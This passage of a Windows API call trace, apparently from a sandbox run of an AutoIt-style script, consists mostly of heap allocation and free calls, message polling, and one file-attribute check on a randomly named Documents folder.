lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0082.453] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0082.453] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e87e8 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0082.454] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0082.454] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0082.454] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0082.454] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0082.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0082.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0082.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0082.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0082.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0082.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0082.455] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0082.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0082.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.457] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0082.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0082.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x62) returned 0x41a7ff8 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e310 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d3920 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a7ff8 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.459] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.459] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.459] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.460] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.460] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.460] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0082.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 